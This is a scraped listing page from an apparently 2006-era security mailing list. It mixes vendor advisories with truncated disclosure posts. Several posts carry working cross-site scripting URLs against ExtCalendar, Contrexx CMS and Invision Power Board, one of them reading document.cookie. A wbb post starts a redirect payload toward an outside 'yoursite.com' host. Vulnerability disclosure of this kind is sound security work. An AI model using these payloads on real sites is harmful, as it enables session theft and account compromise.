|
|
Colapse all |
Post message
[security bulletin] SSRT051128 rev.1 - HP-UX VirtualVault running Apache 1.3.X Remote Unauthorized Access 2006-03-20 security-alert hp com [SECURITY] [DSA 1009-1] New crossfire packages fix arbitrary code execution 2006-03-20 joey infodrom org (Martin Schulze) [SECURITY] [DSA 960-3] New libmail-audit-perl packages fix insecure temporary file use 2006-03-20 joey infodrom org (Martin Schulze) ExtCalendar v1.0 Multiple Xss Vuln 2006-03-19 Soothackers gmail com ------------------------------------------ ExtCalendar v1.0 Multiple Xss Vuln ------------------------------------------ Bug: http://victim/path/calendar.php?op=cal&month=3&year="><script>alert(/Soo t/)</script> http://victim/path/calendar.php?op=cal&month="><script>alert(/Soot/)</sc ript>&ye [ more ] [ reply ] Xss in Wbb 2.3.4 2006-03-18 r57shell gmail com hi again friends i discovered a xss in wbb again ;) in wbb/acp/lib/class_db_mysql.php in the 123.line $errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>"; hmm what can we do with that? if there is an sql db error you may do /wbb/xx.php?<script>location.href='http://yoursite.com/xss.ph [ more ] [ reply ] Contrexx CMS Xss Vuln 2006-03-18 Soothackers gmail com ------------------------------------------ ***Contrexx CMS Xss Vuln*** ------------------------------------------ Site : http://www.contrexx.com Bug : http://victim/path/index.php/"><script>alert(/Soot/)</script> Vulnerable : All Version ( => v1.0.8 ) -------------------------------- [ more ] [ reply ] [FLSA-2006:174479] Updated libungif packages fix security issues 2006-03-17 Marc Deslauriers (marcdeslauriers videotron ca) [FLSA-2006:157459-2] Updated kernel packages fix security issues 2006-03-17 Marc Deslauriers (marcdeslauriers videotron ca) Oxynews Sql İnjection 2006-03-16 r00t3rr0r gmail com Oxynews Sql İnjection Website:http://www.oxynews.net/ Demo:http://www.scriptevi.com/files/demo/news/oxynews/ ------------------------------------------------------------------- Credit:R00t3RR0R Website:www.biyosecurity.be / www.biyo.tk mail: r00t3rr0r (at) gmail (dot) com [email concealed] ---------------------------- [ more ] [ reply ] [FLSA-2006:173274] Updated gdk-pixbuf packages fix security issues 2006-03-17 Marc Deslauriers (marcdeslauriers videotron ca) Re: Linux zero IP ID vulnerability? 2006-03-17 Marco Ivaldi (raptor 0xdeadbeef info) > Hi Marco! Hey Andrea, > - [PIRELLI HOME ACCESS GATEWAY] Based on your tests, this device shows the standard incremental IP ID behaviour: so, nothing special here. > - [MY BOX WITH 2.6.15.6 #1 i686 pentium4 GNU/Linux (vanilla)] [snip] > (closed port + S flag) > bunker@syn:~$ cat hping.closed [ more ] [ reply ] [SECURITY] [DSA 1006-1] New wzdftpd packages fix arbitrary shell command execution 2006-03-16 Moritz Muehlenhoff (jmm debian org) [SECURITY] [DSA 1008-1] New kpdf packages fix arbitrary code execution 2006-03-17 joey infodrom org (Martin Schulze) Fedora Legacy Server Outage 2006-03-17 Marc Deslauriers (marcdeslauriers videotron ca) As we sent out today's security advisories, one of our servers experienced an outage before completely syncing to the mirrors. As a result, the updates repository contains missing packages. This situation should be corrected shortly. I apologize for any problems this may cause. Marc. -----BEGIN P [ more ] [ reply ] [FLSA-2006:157459-1] Updated kernel packages fix security issues 2006-03-17 Marc Deslauriers (marcdeslauriers videotron ca) Re: Remote overflow in MSIE script action handlers (mshtml.dll) 2006-03-17 c0redump ackers org uk Worked like a treat first time on IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 and exited with error: "Unhandled exception at 0x7d56a08d in iexplore.exe: 0xC0000005: Access violation writing location 0x037c7eb8." c0redump ----- Original Message ----- From: Michal Zalewski To: Daniel Bonekeeper Cc [ more ] [ reply ] Generically Determining the Prescence of Virtual Machines 2006-03-17 valsmith metasploit com At OffensiveComputing we were looking at ways to detect virtual machines and had found and discarded many unsophisticated methods such as looking for VMWare Tools running as a service or VMWare related registy keys, etc. Then we discovered Joanna Rutkowska's very interesting "Redpill" method. This w [ more ] [ reply ] Symantec Security Advisory SYM06-004 2006-03-17 secure symantec com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Symantec Security Advisory SYM06-004 17 March 2006 Veritas Backup Exec: Application Memory Denial of Service Revision History None Severity Medium Remote Access - Yes Local Access - No Authentication Required -No Exploit publicly available - No [ more ] [ reply ] XSS IN Invision Power Board 2006-03-17 ???? ???? (mr_snake_my hotmail com) Software: Invision Power Board Web Site:http://www.invisionpower.com tested in v2.0.4 exploit : forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb024288988 9796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie) </script> forum/index.php?act=Search&nav=au&CODE=show& [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00612828
Version: 1
HPSBUX02101 SSRT051128 rev.1 - HP-UX VirtualVault running Apache
1.3.X Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted
upon as s
[ more ] [ reply ]